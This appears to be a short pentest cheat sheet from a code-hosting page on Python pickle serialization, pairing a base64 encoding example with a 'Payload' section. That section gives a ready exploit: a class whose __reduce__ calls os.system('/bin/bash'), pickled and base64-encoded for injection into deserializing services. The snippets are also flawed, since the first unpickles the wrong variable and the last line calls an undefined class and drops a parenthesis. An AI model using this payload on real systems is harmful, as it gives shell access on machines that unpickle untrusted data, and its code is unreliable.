787 B

Raw Blame History

Pickle

Serializes a Python object into a byte stream an back. When sending pickled data through a network do base64 encoding first to prevent special characters to do something unexpected.

import pickle
import base64


text = "Hello, World!"
pickled = pickle.dumps(text)
send_data = base64.b64encode(pickled)
receive_data = base64.b64decode(send_data)
unpickled = pickle.loads(pickled)

Payload

The following payload can be injected into a pickled object.

import pickle
import os
import base64
class evil_object(object):
    def __reduce__(self):
        return(os.system, ('/bin/bash',))
x = evil_object()
y = pickle.dumps(x)
base64.b64encode(y)

Dump serialized object via

pickle.dump(SerializedPickle(), open('pickled.out', 'wb')

787 B Raw Blame History

Pickle

Payload

787 B

Raw Blame History